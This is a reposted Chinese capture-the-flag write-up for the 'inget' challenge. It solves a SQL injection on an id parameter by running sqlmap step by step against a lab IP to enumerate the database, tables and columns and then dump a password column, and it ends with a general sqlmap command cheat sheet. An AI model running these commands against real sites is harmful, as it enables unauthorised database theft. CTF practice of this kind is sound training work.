当前位置:   article > 正文

攻防世界-宜兴网信办-inget_inget宜兴网络办

inget宜兴网络办

题目

访问题目路径

 这个题目的意思就是请输入ID,然后尝试绕过,那应该就是SQL注入,但是呢,我是个懒狗,我直接跑sqlmap

先跑数据库名

sqlmap "http://61.147.171.105:51322/?id=1" --current-db

爆表

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber --tables

爆字段

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber -T cyber --columns

 

爆数据

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber -T cyber -C "pw" --dump

 

 sqlmap常用命令

注入检测方式:

get方式:sqlmap.py -u "URL"

post方式:sqlmap.py -u "URL" -date "post数据"

cookie方式:sqlmap.py -u "URL" -cookie "cookie数据"

获取数据库信息

获取数据库类型以及版本:sqlmap.py -u "URL"

获取网站使用的数据库名和用户名:sqlmap.py -u "URL" --current-db

                                                          sqlmap.py -u "URL" --current-user

获取数据量和用户权限

获取数据库的数据量:sqlmap.py -u "URL" --count -D "数据库名"

判断用户权限:sqlmap.py -u "URL" --privileges

Mysql注入

首先获取当前库名:sqlmap.py -u "URL" --current-db

其次获取库中表名:sqlmap.py -u "URL" --tables -D "数据库名"

然后获取库中某个表的列名:sqlmap.py -u "URL" --columns -T "表名" -D "库名"

最后获取库中某个表名的某个列名的字段内容:sqlmap.py -u "URL" --dump -C "列名" -T "表名" -D "库名"

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/335165
推荐阅读
相关标签
  

闽ICP备14008679号